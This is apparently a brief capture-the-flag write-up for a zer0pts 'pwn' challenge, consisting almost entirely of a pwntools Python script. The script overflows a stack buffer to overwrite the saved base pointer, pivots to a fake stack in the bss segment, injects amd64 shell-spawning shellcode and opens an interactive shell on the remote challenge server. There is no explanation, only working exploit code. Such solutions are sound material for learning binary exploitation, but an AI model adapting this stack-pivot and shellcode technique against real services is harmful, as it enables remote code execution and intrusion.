Tags: pwn stackoverflow
Rating: 3.0
```
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
elf = ELF("./chall")
p = remote("pwn.ctf.zer0pts.com", 9011)
# overwrite saved rbp
bss_addr = 0x0600234 #__stack_shadow
payload = b"A" * 0x100
payload += p64(bss_addr + 0x100)
p.sendlineafter("Data: ", payload)
# construct fake stack
payload = p64(0)+p64(bss_addr+ 0x10)
print(shellcraft.sh())
payload += asm(shellcraft.sh())
p.sendlineafter("Data: ", payload)
p.interactive()
```